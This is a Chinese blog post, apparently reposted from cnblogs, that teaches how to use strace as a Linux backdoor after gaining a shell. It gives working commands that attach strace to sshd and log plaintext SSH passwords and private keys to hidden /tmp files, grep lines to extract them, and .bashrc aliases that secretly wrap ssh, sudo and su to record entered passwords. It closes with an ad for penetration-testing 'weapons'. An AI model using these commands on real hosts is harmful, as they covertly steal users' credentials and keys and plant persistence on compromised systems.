linux后门之strace后门键盘记录

时间：2021-02-22 12:37:54 阅读：0 评论：0 收藏：0 [点我收藏+]

介绍

strace是一个动态跟踪工具，它可以跟踪系统调用的执行。我们可以把他当成一个键盘记录的后门，来扩大我们的信息收集范围

使用场景

通过其他方式拿到shell,通过history、流量抓包、或者本地没有翻到密码的情况。我们想要获取当前主机的密码，或者通过这台主机连接到其他主机的密码。

记录sshd进程明文密码

执行如下命令

(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {‘print $2‘}` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)、

技术图片

当用户通过密码登录时，使用如下命令查看记录的密码

grep -E ‘read\(6, ".+\\0\\0\\0\\.+"‘ /tmp/.sshd.log

技术图片

记录sshd私钥

(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {‘print $2‘}` -t -e trace=read,write -s 4096 2> /tmp/.sshd.log &)

当用户通过私钥登录时，使用如下命令查看记录的私钥

grep ‘PRIVATE KEY‘ /tmp/.sshd.log

记录ssh的登录凭证

我们还可以记录本机执行ssh、su等命令，这里以ssh为例

修改alias

# 添加命令
vi ~/.bashrc或者/etc/bashrc
alias ssh=‘strace -f -e trace=read,write -o /tmp/.ssh-`date ‘+%d%h%m%s‘`.log -s 32 ssh‘
# 立即生效
source ~/.bashrc

技术图片

执行 ssh 10.xx.xx.148 -l mysql

技术图片

会在 /tmp/ 目录下多个log

技术图片

读取log中记录的密码

grep -A 9 ‘password‘ .ssh-202月021613809979.log

技术图片

记录sudo、su的alias

alias sudo=‘strace -f -e trace=read,write -o /tmp/.sudo-`date ‘+%d%h%m%s‘`.log -s 32 sudo‘
alias su=‘strace -f -e trace=read,write -o /tmp/.su-`date ‘+%d%h%m%s‘`.log -s 32 su‘

公众号: 【渗透测试教程】专注渗透测试、渗透自动化武器研发。回复666，免费领取渗透学习资料+工具！希望能够给你带来收获！
技术图片

linux后门之strace后门键盘记录

标签：系统工具 gre bdd 场景公众读取通过 roc

原文地址：https://www.cnblogs.com/awake1t/p/14425766.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行